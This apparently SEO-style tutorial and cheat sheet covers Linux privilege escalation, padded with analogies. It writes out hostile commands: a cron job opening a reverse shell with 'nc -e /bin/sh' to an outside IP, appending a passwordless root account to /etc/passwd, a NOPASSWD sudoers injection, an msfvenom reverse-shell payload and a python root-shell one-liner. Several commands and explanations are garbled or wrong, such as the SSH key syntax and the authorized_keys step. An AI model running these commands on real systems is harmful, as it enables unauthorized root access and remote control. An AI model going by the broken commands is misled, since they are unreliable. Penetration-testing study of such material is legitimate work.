Some common Linux privilege escalation techniques:
| Technique | Description | Commands |
|---|---|---|
| Kernel exploits | Exploit vulnerabilities in the kernel itself to escalate privileges. | Search for exploits using kernel version: uname -a<br>Use tools like linux-exploit-suggester to find potential exploits. |
| SUID/GUID binaries | Escalate privileges by abusing binaries with SUID/GUID flags set. | Find SUID/GUID binaries: find / -perm -4000 -type f 2>/dev/null<br>Exploit vulnerable binaries like low SUID vim, python etc. |
| Sudo exploit | Exploit sudo configuration and vulnerabilities in sudo versions. | Check sudo privileges: sudo -l<br>Exploit CVE-2019-14287 if sudo <1.8.28. |
| Cron jobs | Schedule jobs and scripts with cron as privileged users. | Check cron jobs: ls -al /etc/cron*<br>Create cron job as root: echo "nc -e /bin/sh 10.0.0.1 4444" > /etc/cron.d/job |
| Service exploits | Target insecure service configurations and exploit poor permissions. | Check service permissions: systemctl list-unit-files --type=service<br>Start/stop services, look for execution errors. |
| PATH variable | Add custom PATHs with escalated SUID binary exploits. | Check PATH: echo $PATH<br>Add PATH containing exploit like: export PATH=/tmp:$PATH |
| Writable /etc/passwd | Modify /etc/passwd to create superuser account. | Check /etc/passwd permissions: ls -al /etc/passwd<br>Add user: echo "hacker::0:0:root:/root:/bin/bash" >> /etc/passwd |
| Misconfigured binaries | Exploit poor file permissions on binaries. | Find binaries with no root owner: find / -perm -4000 ! -user root -type f 2>/dev/null |
| SSH keys | Use SSH private keys found on system to login as another user. | Check for private SSH keys: find / -name id_rsa 2>/dev/null<br>SSH in with key: ssh -i keyholder@server |
Hardening Linux configurations through least privilege principles, strict file permissions, and constant patching is key. Monitoring for privilege gaining behavior can also detect escalation attempts. Defense in depth limits attack vectors and makes exploitation more difficult.
Table Of Contents
Key Takeaways
Understanding Linux Privilege Escalation
In a basic Linux system, there are many different roles and user accounts. One of the most powerful is the root user, which has the authority to execute commands that change the very core of the system. Privilege escalation is the practice of gaining more permissions than originally given, essentially elevating one’s privileges from a low privilege user to a root user. This allows the escalated user to run commands as root, giving them ultimate control over the Linux system.
For example, imagine you’re trying to get into a locked room (the Linux system) and you only have a basic key (low privilege user). Privilege escalation is like finding a master key (root user) that unlocks every door.
Insight into SUID Privilege Escalation
SUID, or Set User ID, is a special type of file permission given to a file. When the file with SUID bit set is executed, the user is allowed to perform all activities that the owner of the file can do, even if the owner is the root. This mechanism could potentially be exploited, if the file is writable and can be overwritten, to escalate privileges on the system.
Consider a scenario where you’re allowed to play the role of a supervisor at your job for a day (suid bit set), allowing you to execute tasks (commands) typically reserved for the supervisor (root). If you could extend this privilege indefinitely (exploitation), you’d have more control over the operations at your job (Linux system).
Recognizing Different Privilege Escalation Techniques
There are multiple ways to achieve privilege escalation. This can range from exploiting a vulnerable script or binary to creating a reverse shell. Key techniques include checking for SUID/SGID files, finding writable directories or files, exploiting a cronjob or misconfigured file permissions, and more.
Let’s use an analogy to clarify this. Suppose each technique is a different path up a mountain (the Linux system). Some paths might be steep and dangerous (exploiting a script), while others might be less challenging but longer (exploiting file permissions). The goal is to reach the peak (root access), and your choice of path depends on your capabilities and the mountain’s conditions (system’s configuration and security measures).
Using a Cheat Sheet to Ease the Process
A cheat sheet is a handy reference guide that lists helpful commands and techniques for privilege escalation. The “Linux Privilege Escalation Cheat Sheet,” for example, might contain commands like ‘ls -al’ to list files in a directory, ‘uname -a’ to display Linux system information, or ‘sudo -l’ to list commands the user might be able to escalate their privileges with.
Think of a cheat sheet as your map or GPS when hiking up that mountain. It provides you with all the necessary paths (commands) and their intricacies, enabling you to reach the peak (root access) more efficiently.
A Basic Introduction to Linux Privilege Escalation
Privilege Escalation Defined
Imagine you’re at an amusement park. There are different rides and attractions, some for kids, others for adults. You’re an adult, so you get a pass that lets you go on all the rides. Now, that’s what we call a privilege! In computer terms, ‘privilege’ is similar. It defines what you can or cannot do on a system.
Linux privilege escalation is like getting an upgrade from a child’s pass to an adult’s pass. In simpler words, it’s the process where a user receives elevated access or abilities beyond what was initially granted. This user, now armed with these enhanced privileges, can manipulate the system in ways an ordinary user couldn’t. Imagine having the power to operate any ride in the amusement park; that’s the equivalent of a ‘root’ user in Linux!
username@hostname:~$ sudo -l
Using the command sudo -l (1) allows you to check the commands you’re able to execute as another user (2), for instance, a root user.
The Significance of Privilege Escalation in Linux
If you think about the amusement park, not everyone should have the power to operate all the rides. It could lead to chaos or even accidents. Similarly, in Linux, privilege escalation is important because it prevents unauthorized users from performing certain actions that can compromise the system.
ls -al /etc/passwd
For instance, using ls -al (1) command to list file permissions can show if a user can modify the /etc/passwd file (1), which contains system user information.
Privilege Escalation and the Kernel Version
In our amusement park analogy, consider the ‘kernel version’ to be like the rule book that governs how the park operates. The kernel version plays a vital role in Linux privilege escalation. Different kernel versions can have different vulnerabilities that can be exploited to achieve privilege escalation.
uname -a
To check the kernel version, we use the uname -a command (1). Remember, the kernel is the heart of the Linux system, so a vulnerable kernel can lead to full system control if exploited!
Types of Privilege Escalation Techniques
Enumeration in Privilege Escalation
Like playing a detective, enumeration is about collecting as much information as possible. Here, we gather data about the system to identify potential vulnerabilities.
dpkg -l rpm -qa
In Linux, we use commands like dpkg -l (1) or rpm -qa (1) to list installed packages and search for any that might be outdated or vulnerable.
Understanding Sudo Exploitation
Remember the sudo -l command we talked about earlier? Well, it’s also a handy tool for exploiting sudo privileges. Suppose you can run a command with sudo, or even better, run all commands with sudo. In that case, you’re essentially running them as a root user.
sudo -i python
For instance, being able to execute the sudo -i python command (1), allows you to run Python (1) as a root user.
Cron Job and its Importance
Think of cron jobs as the park’s schedule for when certain events or shows happen. In Linux, cron jobs are tasks scheduled to run automatically at fixed times or dates. They can be exploited if they run with elevated privileges.
crontab -l ls -alh /etc/cron.*
We can check for cron jobs using the crontab -l command or look at system-wide cron jobs with ls -alh /etc/cron.* (1). If you spot a cron job running a script you can write to, you might have found your ticket to a root shell (1)!
Exploitation of File Permissions
Remember how not everyone at the amusement park should have the power to operate the rides? File permissions are like those powers. They determine who can read, write, or execute a file. If a file has inappropriate permissions, it can be exploited.
ls -l /path/to/file chmod 777 /path/to/file
To check a file’s permissions, you can use the ls -l command (2), and to modify them, you can use the chmod command (1), but be careful not to give more permissions than necessary. That’s like giving a child the key to the rollercoaster control room!
Diving into SUID Privilege Escalation
Understanding SUID
Set User ID, or SUID, is a special type of file permission in Linux. Unlike traditional file permissions, when a file with SUID permission is executed, it executes not with the privileges of the user who launched it, but with the privileges of the file owner.
Imagine it this way: if you’re a regular student with no special access rights in school, but you found the principal’s key (the file with SUID permission). Using this key (running the file), you can access places in the school (perform operations) that only the principal can access.
You can find these special files by using the find command, and adding -type f to search for files. Combine this with the -perm flag and -4000 to look for files with SUID permission:
find / -type f -perm -4000 2>/dev/null
The 2>&1 redirects any errors to /dev/null to make the output cleaner.
Why is SUID Important?
SUID is a critical concept in the world of Linux privilege escalation. Why? Because if we can find a file that can be run as root and has a vulnerability, we can exploit that file to elevate our privileges to the level of root.
Consider a scenario where we have an application that uses the bash_history file. If that application is set to run as root, and we can somehow trick it into executing our command, we effectively become root!
SUID Privilege Escalation Cheat Sheet: A Handy Reference
Knowing the SUID privilege escalation commands is useful. However, remembering all of them can be a challenge. That’s where a cheat sheet comes in handy.
For example, a typical SUID privilege escalation exploit may involve creating a local file using the touch command, setting the SUID permission using chmod, and then executing the file.
In the following table, you’ll find a reference for SUID privilege escalation commands.
| Command | Explanation |
|---|---|
find / -type f -perm -u=s -exec ls -la {} \; 2>/dev/null | Finds all files with SUID permissions |
python -c 'import os; os.setuid(0); os.system("/bin/bash")' | Executes a new shell with root privileges |
grep -i 'username' /etc/passwd | Searches for a specific username in the /etc/passwd file |
ssh -i ssh_key username@hostname | Connects to the host using a specific SSH key |
msfvenom -p linux/x86/shell_reverse_tcp LHOST=ip LPORT=port -f elf > shell.elf | Creates a reverse shell using Metasploit |
To take your SUID privilege escalation skills to the next level, consider studying for the Offensive Security Certified Professional (OSCP) certification.
Privilege Escalation Cheat Sheet: A Closer Look
Commands and Techniques for Privilege Escalation
There are many techniques and commands you can use for privilege escalation. Some of them are as simple as changing your user ID with su or sudo, while others involve complex exploits.
Below is a quick reference for some of the most commonly used privilege escalation commands:
| Command | Explanation |
|---|---|
sudo -l | Lists commands you can run with sudo |
netstat -ano | Displays active network connections, along with the PID and name of the program using the connection |
mysql -u root -p | Logs into MySQL as root |
find / -type f -perm -u=s -exec ls -la {} \; 2>/dev/null | Finds all files with SUID permissions |
Utilizing a Cheat Sheet for Efficient Privilege Escalation
While learning about privilege escalation, a cheat sheet can be your best friend. Cheat sheets allow you to quickly reference the syntax or usage of a command or technique, saving you valuable time and effort.
Consider exploring tools like linpeas or gtfobins to aid in your privilege escalation journey. These are great resources that provide extensive, well-structured information about common Linux privilege escalation techniques.
Importance of Kernel Exploit in Cheat Sheet
The kernel is the core of an operating system. It’s the bridge between applications and the actual data processing done at the hardware level. In the context of privilege escalation, if you can exploit a vulnerability in the kernel, you can gain complete control over the system.
Linux kernel exploits often rely on abusing features like SUID binaries or service misconfigurations. A common example is misconfigured sudo privileges, where a user may be granted sudo access to a command they shouldn’t have.
The following commands can help you find kernel exploits:
| Command | Explanation |
|---|---|
uname -a | Displays Linux kernel information |
cat /etc/issue | Displays the operating system information |
grep 'linux-image' /var/lib/dpkg/status | Searches for installed Linux kernels |
Overall, understanding Linux privilege escalation and utilizing cheat sheets can significantly enhance your system administration and cybersecurity skills.
Advanced Linux Privilege Escalation Techniques
We’re now venturing into the realm of advanced Linux privilege escalation techniques, a significant leap from basic Linux privilege escalation. These advanced techniques often require a deeper understanding of Linux system mechanics, but with our handy privilege escalation cheat sheet and some patience, they’re entirely manageable. Let’s dive in!
Techniques and Commands for Exploiting Sudo Rights
One of the most powerful techniques in Linux privilege escalation involves exploiting sudo rights. For those who don’t know, ‘sudo’ is like a golden key that allows you to execute commands with the privileges of another user, usually the superuser or root. It’s like being handed the keys to the city—you get access to everything!
Let’s consider a scenario where you have access to a system, but you’re a regular user, not a superhero root user. However, you discover that you can run the passwd command with sudo rights, allowing you to change the password of any user, including root! It’s like finding a hidden switch in a game that turns you from a pawn into a king. Here’s how you do it:
sudo passwd root
After executing this command, you’re prompted to enter a new password for root, and voilà! You’ve just escalated your privileges to that of the root user.
Uncovering Exploitation Opportunities with Cron Jobs
Cron jobs can be a gold mine when it comes to privilege escalation. Imagine cron jobs as employees that have specific tasks to do at fixed times, just like the mailman who comes at the same time every day to deliver your mail. The issue arises when these cron jobs are misconfigured and perform tasks that they shouldn’t, opening a window for exploitation.
Let’s say we have a cron job that’s running a script (script.sh) as root every minute. We have write permissions (-w) on this script. It’s like being handed a megaphone at a concert—suddenly, you’re in control of the show.
With our megaphone (write permission), we can modify the script, adding our command to escalate privileges. The command might be as simple as adding our user to the sudo group, effectively giving us sudo rights! Here’s the command:
echo 'echo "username ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers' > script.sh
The next time the cron job runs, it executes our modified script, and we’re in the sudoers file with full sudo rights. It’s like upgrading your ticket at a concert from standard to VIP—all-access.
Escalation via File Permissions: Techniques and Best Practices
File permissions are like a set of rules that dictate who can do what with a particular file. Understanding these permissions and how to manipulate them is essential for Linux privilege escalation.
Let’s say we’ve found a file (let’s call it “golden_ticket.txt”) owned by the root user, and we have write permissions on it. This is a fantastic opportunity to exploit. We can write our public SSH key into the root user’s authorized_keys file, which is like copying our house key and placing it under the doormat of the root user’s house!
Here’s a step-by-step guide on how to do it:
- Generate an SSH key pair on your machine (if you haven’t done it yet).
- Write your public SSH key to the file
golden_ticket.txt. - Use a command like this to append your key to the
authorized_keysfile:
echo 'command="cat ~/golden_ticket.txt >> ~/.ssh/authorized_keys" ' > golden_ticket.txt
After running this, you’ve effectively escalated your privileges—you now have SSH access as the root user!
Utilizing Kernel Exploits for Privilege Escalation
The Linux kernel, the heart of the operating system, occasionally has vulnerabilities that can be exploited. Kernel exploits are like discovering a secret door into the castle, allowing us to gain elevated privileges. However, they’re considered advanced techniques because they require a good understanding of the Linux kernel, its functions, and how to compile and run C programs.
Let’s say we’ve found a kernel exploit online. Before running it, we have to ensure it matches our kernel version (you can use the uname -r command to find your kernel version). If it does, we’re good to go!
Kernel exploits are usually C programs, so they’ll need to include libraries like <stdio.h>. To compile and run it, we can use commands like these:
gcc -o exploit exploit.c ./exploit
If everything works correctly, congratulations! You’ve just escalated your privileges using a kernel exploit, much like finding a secret password that suddenly gives you the run of the entire castle. Be sure to use this power responsibly, and always remember—your knowledge of Linux privilege escalation techniques is a tool, not a weapon.
FAQ
Why is understanding privilege escalation important?
Privilege escalation refers to the practice of exploiting system vulnerabilities to gain access to resources that are usually restricted. Understanding this is essential both for system administrators who need to protect against such vulnerabilities and for penetration testers who need to exploit them to evaluate system security.
How can I use a cheat sheet to help with privilege escalation?
Using a cheat sheet for privilege escalation is akin to having a secret decoder ring. It offers an easy reference for common commands, methods, and steps required for privilege escalation. It is especially useful when you can’t remember a specific command or when you’re exploring new aspects of privilege escalation. Like a decoder ring, it can help you unravel the complexities of the task at hand quickly and effectively.
What is SUID and how does it relate to privilege escalation?
SUID, or Set User ID, is like a magical cloak that changes the wearer’s identity. When a program with SUID permission is executed, it runs with the permissions of the file owner (usually a system administrator or a special system user) rather than the user who ran it. This could be exploited to gain unauthorized access or perform privileged operations, hence its relevance to privilege escalation.
How does kernel version impact privilege escalation?
Think of the kernel version as the blueprint of a building. Different blueprints have different structural strengths and weaknesses. In a similar way, different kernel versions have different security strengths and vulnerabilities. Knowing the kernel version can help you identify potential vulnerabilities that can be exploited for privilege escalation.
What’s the difference between windows and Linux privilege escalation?
Comparing Windows and Linux privilege escalation is like comparing apples and oranges. They are similar in that they both involve gaining higher privileges than initially assigned. However, the techniques and methods used vary greatly due to the inherent differences in the design, file systems, command syntax, and security implementations of the two operating systems.
What are some common commands used in privilege escalation?
Some common commands for privilege escalation are like the standard tools in a handyman’s toolkit. They’re essential and versatile. For example, sudo allows a permitted user to execute a command as the superuser, su lets you switch to another user account, and id displays the current user and group information. Commands like uname -a can provide valuable system information for finding potential exploits.
What is a kernel exploit in the context of privilege escalation?
A kernel exploit can be likened to a secret passage in a castle, leading directly to the throne room. The kernel is the heart of an operating system and has complete control over everything in the system. A kernel exploit takes advantage of a flaw in the kernel, granting unauthorized access to system-level resources, much like finding a secret passage leading directly to the throne.
What is enumeration in the context of privilege escalation?
In privilege escalation, enumeration is like a detective investigating a case. It involves gathering information about the target system, such as user account details, network configurations, running services, and more. This information can then be analyzed for potential weak points that could be exploited for privilege escalation, much like a detective looking for clues to crack a case.
How does file permissions exploitation work?
Exploiting file permissions is akin to finding an unlocked door in a secured building. Each file and directory in a Linux system has associated permissions that control access. If these permissions are misconfigured, they could allow unauthorized read, write, or execute access to sensitive files or directories, leading to privilege escalation.
What is a cron job and how does it relate to privilege escalation?
A cron job is like a robotic butler that automatically performs scheduled tasks. If a cron job is configured to run scripts or programs with high-level privileges, a user might exploit it to run unauthorized commands or alter scripts. This way, the user could achieve privilege escalation, like a rogue butler doing the bidding of the wrong master.
Conclusion
Importance of Understanding Linux Privilege Escalation
To understand the significance of Linux privilege escalation, consider it like being at the helm of a ship. Just as a captain has different permissions and privileges than the crew, in the Linux world, different users have different permissions. This is a core concept that ensures the safety and stability of your Linux system. Now imagine if a crew member could perform actions that only the captain is supposed to do. That’s exactly what Linux privilege escalation is – it’s like promoting a crew member to a captain, temporarily or permanently.
One could compare Linux privilege escalation to a game of chess. Think of bash suid as your knight, and each linux file as a pawn. Each has a different role and capabilities. Similarly, in a Linux system, different files and programs have various permissions, some more than others.
For instance, let’s use the analogy of a lock and key. Suppose you’re trying to gain entry to a room (say, a particular linux file) but you don’t have the right key (or in Linux terms, you lack the required permissions). Linux privilege escalation is akin to acquiring a master key that can unlock any door.
Utilizing Cheat Sheets as a Helpful Tool for Privilege Escalation
Cheat sheets serve as quick references or guides in a world where remembering all commands and options can be overwhelming. Similar to how a handy math formula cheat sheet might save you during a challenging exam, a privilege escalation cheatsheet can be invaluable when dealing with complex system tasks.
Imagine you’re a detective investigating a complex case (or a Linux system). Just as a detective uses various tools, such as magnifying glasses and fingerprint powder, to uncover hidden clues, the -v and -e options are tools in your toolbox that can help you unravel the mysteries of a Linux system.
Think of -v as your flashlight, allowing you to see more details about commands and -e as your magnifying glass, letting you examine file information in greater detail.
Encouragement to Learn and Master Various Privilege Escalation Techniques
Getting the hang of Linux privilege escalation techniques may seem intimidating, but with time and practice, it becomes less daunting. Consider it as learning a new language. At first, every term might seem strange and complex, but as you learn more words (or in our case, commands) and understand the grammar (or the Linux structure), you start to get the hang of it.
If you were to compare operating systems to languages, Linux might be Latin – a base for many other languages. In comparison, windows privilege escalation can be considered like learning a dialect of that language. For example, if you are familiar with how things work in Windows 8, transitioning to Linux would be like learning a new dialect of a language you already know.
Just as a library would be an ideal place for learning a new language, Linux is an open book waiting to be explored. Every hostname in your system is like a new chapter with its own unique story.
So, keep exploring, keep learning, and remember that every master was once a beginner. Your journey to mastering Linux privilege escalation is just like that – a continuous process of learning and exploration. As a famous saying in the programming world goes, “Hello, world!”, now it’s time to say “Hello, Linux!”.
